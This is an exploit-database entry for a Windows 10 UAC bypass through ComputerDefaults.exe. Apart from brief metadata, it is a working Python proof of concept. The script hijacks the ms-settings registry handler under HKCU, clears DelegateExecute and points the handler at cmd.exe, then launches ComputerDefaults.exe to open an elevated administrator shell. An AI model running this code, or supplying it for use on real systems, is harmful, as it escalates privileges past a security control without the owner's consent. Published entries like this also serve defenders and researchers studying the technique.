Microsoft Windows 10 UAC Bypass By computerDefault

2018.10.23
Credit: Fabien Dromas
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/env python # # Exploit Title: Windows 10 UAC Bypass by computerDefault # Date: 2018-10-18 # Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com> # Twitter: st0rnpentest # # Vendor Homepage: www.microsoft.com # Version: Version 10.0.17134.285 # Tested on: Windows 10 pro Version 10.0.17134.285 # import os import sys import ctypes import _winreg def create_reg_key(key, value): try: _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command') registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE) _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) _winreg.CloseKey(registry_key) except WindowsError: raise def exec_bypass_uac(cmd): try: create_reg_key('DelegateExecute', '') create_reg_key(None, cmd) except WindowsError: raise def bypass_uac(): try: current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__ cmd = "C:\windows\System32\cmd.exe" exec_bypass_uac(cmd) os.system(r'C:\windows\system32\ComputerDefaults.exe') return 1 except WindowsError: sys.exit(1) if __name__ == '__main__': if bypass_uac(): print "Enjoy your Admin Shell :)"

